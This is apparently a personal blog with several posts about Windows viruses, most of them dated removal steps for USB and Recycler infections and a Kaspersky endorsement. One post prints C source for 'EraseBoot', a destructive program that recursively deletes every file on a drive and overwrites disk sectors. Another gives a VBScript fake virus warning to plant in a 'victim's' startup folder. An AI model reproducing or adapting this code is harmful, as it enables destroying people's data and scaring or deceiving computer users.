Thursday, July 30, 2009
I had been bugged by the newfolder.exe virus often.
Here is a simple way to remove it from your pen drive.
Search for *.exe on your pen drive.
Arrange the icons by Modified.
Delete the exe files which have a folder icon!
Just thought of it, when my pendrive got affected by the virus!
Labels: World of virus
Sunday, June 21, 2009
My laptop had been infected for a long time by a virus. I had identified it to be the recycler virus a couple of weeks ago. But I had never really tried to remove it. Yesterday evening, the virus started virtual memory hijacking (i.e., loading more memory for other processes). I could not bear it any longer.
So I started to search about the recycler virus. And I have made a small tutorial on the steps to remove the virus.
1. Go to your drive (in the command prompt, C:\ or D:\) and type ATTRIB -S -A -H -R.
2. Ensure that you are able to see hidden files by going to Tools > Folder Options > View and enabling the display of hidden files.
3. System Volume Information and Recycler should be visible in your root drive (c: d: or whatever drive you use) .
4. Go to your drive, right-click on the RECYCLER folder and click Delete. It was not deleted in my case, since it was being used by some other process. Force del is a useful application to override this error and delete the folder.
5. Right-click on the System Volume Information folder and go to Properties. Go to the tab labeled Security. If your user name is not there, add the username that you use for XP. Give yourself all security rights, as well as the SYSTEM user. Then press OK. If you cannot see the Security tab and you are using XP Professional, go to Tools > Folder Options > View, uncheck the box "Use simple file sharing" and select Apply.
If you have no clue of what step 5 was, there's a simpler way of doing it.
- Click Start, click Run, type cmd, and then click OK.
- Make sure that you are in the root folder of the partition for which you want to gain access to the System Volume Information folder. For example, to gain access to the C:\System Volume Information folder, make sure that you are in the root folder of drive C (at a "C:\" prompt).
- Type the following line, and then press ENTER:
  cacls "driveletter:\System Volume Information" /E /G username:F
  Make sure to type the quotation marks as indicated. This command adds the specified user to the folder with Full Control permissions.
- Double-click the System Volume Information folder in the root folder to open it.
- If you need to remove the permissions after troubleshooting, type the following line at a command prompt:
  cacls "driveletter:\System Volume Information" /E /R username
  This command removes all permissions for the specified user.
6. Go to the Recycle Bin on the desktop and right-click it. Choose Properties, then check the box "Do not move files to the Recycle Bin. Remove files immediately when deleted." Press Apply.
7. Go to the System Volume Information folder and delete the last folder. These folders are where XP has taken a snapshot of your system in order to restore it. The virus hides here so that, in the event that you restore the system, it is also restored. If you are not sure which folder to delete, don't worry. Deleting all the folders in System Volume Information will just delete all the restore points.
8. You should now open the registry editor and remove the virus from here so that when you restart the virus is not recreated.
9. Open the registry editor: Start > Run, then type regedit in the box and select OK. The registry will now open.
10. Hit Ctrl+F and type Recycler (iuhi64 should also be searched) in the search box. Delete the entry when found. Press F3 to find the next occurrence of Recycler (iuhi64) and delete it.
11. Close regedit.
12. Go to all installed hard drives and do steps 2 to 6, step 8 and step 9.
13. Run your virus software. You should be able to update any virus software that was previously unupdatable.
14. Restart your computer.
15. Verify that the RECYCLER folder is deleted from your root drive.
16. Then you can uncheck the box in the Recycle Bin that you checked in step 6, to keep all your deleted files in case you need to restore a file that was accidentally deleted.
My findings:
This virus is recreated using the methods of the recycle bin. Every time you delete a file it recreates itself, because it looks in the recycle bin and restores or copies the virus information inside. If the virus cannot be stored inside and is immediately removed once you check the box in step 6, then it cannot recreate itself and all of its power is lost. So erasing it from the registry and the drive ensures that it cannot return. It has two copies, one in the RECYCLER folder and another one in System Volume Information. Deleting both folders does the trick.
http://wiki.answers.com/Q/How_do_you_remove_recycler_virus_found_in_hard_disk
http://www.winmatrix.com/forums/index.php?showtopic=13021
http://support.microsoft.com/
These were the three most useful links for me to understand about the recycler virus and delete it.
Spending an evening with the virus ensured that my laptop was free of the recycler virus.
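Before deleting RECYCLER in step 4, it helps to see which entries in it were not put there by the Recycle Bin itself. The sketch below is an added example, not part of the original post: it assumes the usual XP layout (per-user SID folders holding INFO2, desktop.ini and items renamed to D<drive letter><number>), only lists what does not fit, and runs on a constructed sample tree whose file names are invented.

```python
import re
import tempfile
from pathlib import Path

# Assumed XP layout: RECYCLER\<user SID>\ holds INFO2, desktop.ini and
# deleted items renamed to D<drive letter><number>[.ext].
SID_DIR = re.compile(r"^S-1-5(-\d+)+$", re.I)
BIN_ITEM = re.compile(r"^D[a-z]\d+(\.[^.]+)?$", re.I)
BIN_META = {"info2", "desktop.ini"}

def unexpected_entries(recycler):
    """List paths under RECYCLER that do not fit the layout above."""
    found = []
    for child in sorted(Path(recycler).iterdir()):
        if not (child.is_dir() and SID_DIR.match(child.name)):
            found.append(child)      # stray file or non-SID folder
            continue
        for item in sorted(child.iterdir()):
            if item.name.lower() in BIN_META or BIN_ITEM.match(item.name):
                continue
            found.append(item)       # kept its own name: not renamed by the bin
    return found

def constructed_sample(root):
    """Build a made-up RECYCLER tree for the demonstration (all names invented)."""
    sid = Path(root, "RECYCLER", "S-1-5-21-1111111111-2222222222-3333333333-1003")
    sid.mkdir(parents=True)
    for name in ("INFO2", "desktop.ini", "Dc1.txt", "Dc2", "helper_x.exe"):
        (sid / name).write_bytes(b"")
    Path(root, "RECYCLER", "loader_x.com").write_bytes(b"")
    return Path(root, "RECYCLER")

def demo():
    """Run the check on the constructed tree and return the flagged names."""
    with tempfile.TemporaryDirectory() as tmp:
        return [p.name for p in unexpected_entries(constructed_sample(tmp))]

if __name__ == "__main__":
    print(demo())
```

On a real drive, pass the path of the RECYCLER folder (for example D:\RECYCLER) to unexpected_entries from an account that can read it.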
Labels: Windows corner..., World of virus
Thursday, August 14, 2008
Have a read....
On some computers, when we double-click a drive we get the "Open with" dialog box. This is because of an unwanted file residing on the computer. Its name is "autorun.inf". To delete the file and restore the old behaviour of a drive opening in the same window, do the following steps.
1. Select START --> RUN.
2. Enter "cmd" and press Enter.
3. Type the name of the drive in which you have the problem and press Enter (say, if the problem is in the C drive, enter "C:\").
4. Enter "attrib -s -h -r *.inf".
5. Enter "del *.inf".
Now try opening the drives. I had the problem on my computer. I deleted the autorun.inf file and now the problem is solved. Try it!!!
Article link: http://arun-kumaar.blogspot.com/2008/08/open-with-virus.html
Labels: World of virus
Monday, March 10, 2008
Open notepad and type this:
i=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning").Then save it as Virus.VBS and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.On startup the window should appear.
Note:
This does not harm your computer as it does not contain virus.The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this i=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning").And in between make sure your victim does not panic and really reformat his harddisk.
Labels: World of virus
Tuesday, October 23, 2007
Labels: Controversial issues, World of virus
Monday, October 22, 2007
Having started this blog and posting 13 posts....
I realised today that I have missed out the most used software in my PC.
Today was my semester practical exam. But I was working on this blog instead of studying for my digital exam. This morning I rushed through a half-hour study. But since this is my usual habit for all exams, I was not afraid. I should mention that as I selected a question from the randomly placed sheets I was a little tense. But when I saw the questions I felt the rush of adrenaline. They were easy, I knew. The practicals turned out to be as easy as a 20-20 match for India.
As I was connecting the circuit in my exam and the LED glowed, suddenly my brain lit up. The idea for a post on Kaspersky came to my mind.
So here is my post on kaspersky.
Kaspersky is antivirus software. I regard it as the best antivirus software in the world (wonder why Google is not into it???).
According to AV-Comparatives, Kaspersky Anti-Virus (formerly known as AntiViral Toolkit Pro) rates highly amongst virus scanners in terms of detection rates. In 2006 Kaspersky Anti-Virus was ranked second, and was the recipient of the TopTenReviews Gold Award. According to PC World magazine, Kaspersky antivirus software provides the fastest updates for new virus and security threats in the industry.
Regardless of all these reviews, according to me they are just blah...blah...nonsense. This antivirus is able to detect every process in the computer. You can't ask for better software.
And I love the way it detects a virus as soon as you insert a pen drive carrying one. You see the pop-up saying the virus was detected......I just love this antivirus.....
The link for download is http://www.kaspersky.com/
Download and experience the power of kaspersky!!!!!
Labels: World of virus
Friday, October 19, 2007
Now if you are a regular net user, it is impossible that you don't know what a virus is!!!!
This post has an interesting virus dealt with it.
Which is different from a virus....
The Creeper virus was the first virus detected on ARPANET, the forerunner of the Internet in the early 1970s.
Now history and information apart.....
Let us discuss the art of virus writing.
Virus writing is not a very complicated one.
It is in fact very simple.
You have to have a thorough understanding of the system architecture if you want to be a good virus writer.
Though virus writing is illegal.
It can be done for fun....
But don't go beyond the veil.
A simple C Virus
EraseBoot - A Sample Virus Written In C
/*This is a pretty simple virus which I would not advise running on your own machine.*/
#include
#include
#include
main()
{
SearchAndDestroy("");
span("");
boot();
}
span(p)
char *p;
{
struct ffblk f;char n[129];
int r;
SearchAndDestroy(p);
sprintf(n,"%s\\%s",p,"*.*");
for(r=findfirst(n,&f,0x0010);!r;r=findnext(&f))
{
if(*f.ff_name=='.')
continue;
if(f.ff_attrib & 0x0010)
{
sprintf(n,"%s\\%s",p,f.ff_name);
span(n);
}
}
}
SearchAndDestroy(p)
char *p;
{
struct ffblk f;
char b[81];
int r;
strcpy(b,p);
strcat(b,"\\*.*");
for(r=findfirst(b,&f,0x0000);!r;r=findnext(&f))
{
sprintf(b,"%s\\%s",p,f.ff_name);
remove(b);
}
}
boot()
{
char *buff;
char *test;
delay(1000);
fprintf(test,"THIS VIRUS DESTROYS YOUR FILES!!!!!");
abswrite(2,12,0,buff);
}
//Find the header files by yourself(lol..)
Labels: World of virus